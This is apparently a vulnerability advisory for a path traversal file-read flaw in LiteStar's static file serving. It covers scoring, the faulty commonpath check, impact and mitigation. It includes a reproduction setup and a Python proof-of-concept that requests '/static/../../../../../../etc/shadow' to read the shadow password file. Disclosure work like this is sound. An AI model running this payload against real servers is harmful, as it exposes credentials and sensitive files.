CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
15.5%
Local File Inclusion via Path Traversal in LiteStar Static File Serving
A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.
The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py
.
The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:
commonpath([str(directory), file_info["name"], joined_path])
Given the variables:
directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')
The function outputs ‘/Users/brian/sandbox/test_vuln/static’, incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.
To reproduce this vulnerability, follow these steps:
Set up the environment:
uvicorn
and litestar
packages.static
folder in the root directory of your project and place any file (e.g., an image) in it for testing.Preparation of the testing environment:
/etc/shadow
which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing.main.py
file with the following content to configure and run the LiteStar server:from pathlib import Path
from litestar import Litestar
from litestar.static_files import create_static_files_router
import uvicorn
app = Litestar(
route_handlers=[
create_static_files_router(path="/static", directories=["static"]),
],
)
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", port=8000)
python3 main.py
to start the server.Exploit:
exploit.py
with the following Python code to perform the HTTP request without client-side sanitization:import http.client
def send_request(host, port, path):
connection = http.client.HTTPConnection(host, port)
connection.request("GET", path)
response = connection.getresponse()
print(f"Status: {response.status}")
print(f"Headers: {response.getheaders()}")
data = response.read()
print(f"Body: {data.decode('utf-8')}")
connection.close()
send_request("localhost", 8000, "/static/../../../../../../etc/shadow")
python3 exploit.py
. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.Observe:
/etc/shadow
file, thereby confirming the path traversal vulnerability.This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:
Exposure of Sensitive Information:
Potential for System Compromise:
.env
file might reveal environment variables used for application configurations that include database passwords or API keys.Credential Leakage:
/etc/passwd
or /etc/shadow
(on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.Regulatory and Compliance Violations:
Loss of Trust and Reputation Damage:
Potential for Further Exploitation:
Here’s the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:
To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:
Input Validation and Sanitization:
../
which are used in path traversal attacks.Path Normalization:
os.path.normpath()
in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../
) to prevent directory traversal.if os.path.commonpath([full_path, directory]) != directory:
# Don't allow misbehaving clients to break out of the static files
# directory.
continue
This snippet from Starlette’s implementation ensures that the constructed file path does not traverse out of the specified directory.Naming Convention:
Feature Additions and Changes:
Vendor | Product | Version | CPE |
---|---|---|---|
starliteproject | starlite | * | cpe:2.3:a:starliteproject:starlite:*:*:*:*:*:*:*:* |
* | litestar | * | cpe:2.3:a:*:litestar:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-83pv-qr33-2vcf
github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70
github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b
github.com/litestar-org/litestar/commit/a07b79b84d8717bec5ac4d4674c1e4920ba9c813
github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf
nvd.nist.gov/vuln/detail/CVE-2024-32982